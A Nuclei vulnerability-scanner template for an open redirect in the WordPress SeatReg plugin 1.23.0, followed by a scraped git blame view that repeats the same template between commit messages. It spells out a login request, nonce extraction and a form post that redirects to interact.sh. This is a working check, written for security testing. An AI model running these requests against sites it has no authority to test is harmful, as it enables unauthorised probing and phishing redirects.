nuclei-templates/vulnerabilities/wordpress/seatreg-redirect.yaml

id: seatreg-redirect

info:
  name: WordPress Plugin ‘SeatReg’  - Open Redirect
  author: Mariam Tariq
  severity: medium
  description: |
    WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
  reference:
    - https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html
  metadata:
    verified: "true"
  tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated

requests:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new-registration-name=test&action=seatreg_create_submit&seatreg-admin-nonce={{seatreg-admin-nonce}}&_wp_http_referer=http://interact.sh&submit=Create+new+registration

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - status_code_3 == 302
          - contains(header_3, 'http://interact.sh')
        condition: and

    extractors:
      - type: regex
        name: seatreg-admin-nonce
        part: body
        group: 1
        regex:
          - '"seatreg\-admin\-nonce" value="([0-9a-z]+)"'
        internal: true
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								id: seatreg-redirect
-												seatreg-open-redirect.yaml

											
										
										
											2023-02-16 19:06:05 +00:00
 								info:
-												updated name,matchers
											
										
										
											2023-02-20 17:20:25 +00:00
+								  name: WordPress Plugin ‘SeatReg’  - Open Redirect
-												seatreg-open-redirect.yaml

											
										
										
											2023-02-16 19:06:05 +00:00
+								  author: Mariam Tariq
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								  severity: medium
 								  description: |
 								    WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.
 								  reference:
 								    - https://packetstormsecurity.com/files/167888/WordPress-SeatReg-1.23.0-Open-Redirect.html
 								  metadata:
 								    verified: "true"
-												Auto Generated CVE annotations [Mon Feb 20 18:22:21 UTC 2023] :robot:

											
										
										
											2023-02-20 18:22:21 +00:00
+								  tags: redirect,packetstorm,seatreg,wp-plugin,wp,wordpress,authenticated
-												seatreg-open-redirect.yaml

											
										
										
											2023-02-16 19:06:05 +00:00
 								requests:
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								  - raw:
 								      - |
 								        POST /wp-login.php HTTP/1.1
 								        Host: {{Hostname}}
 								        Content-Type: application/x-www-form-urlencoded
-												seatreg-open-redirect.yaml

											
										
										
											2023-02-16 19:06:05 +00:00
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 								      - |
 								        GET /wp-admin/admin.php?page=seatreg-welcome HTTP/1.1
 								        Host: {{Hostname}}
 								      - |
 								        POST /wp-admin/admin-post.php HTTP/1.1
 								        Host: {{Hostname}}
 								        Content-Type: application/x-www-form-urlencoded
 								        new-registration-name=test&action=seatreg_create_submit&seatreg-admin-nonce={{seatreg-admin-nonce}}&_wp_http_referer=http://interact.sh&submit=Create+new+registration
 								    cookie-reuse: true
-												seatreg-open-redirect.yaml

											
										
										
											2023-02-16 19:06:05 +00:00
+								    matchers:
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								      - type: dsl
 								        dsl:
-												updated name,matchers
											
										
										
											2023-02-20 17:20:25 +00:00
+								          - status_code_3 == 302
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								          - contains(header_3, 'http://interact.sh')
 								        condition: and
-												lint fix
											
										
										
											2023-02-19 18:24:54 +00:00
-												fixed-template
											
										
										
											2023-02-20 10:17:19 +00:00
+								    extractors:
 								      - type: regex
 								        name: seatreg-admin-nonce
 								        part: body
 								        group: 1
 								        regex:
 								          - '"seatreg\-admin\-nonce" value="([0-9a-z]+)"'
 								        internal: true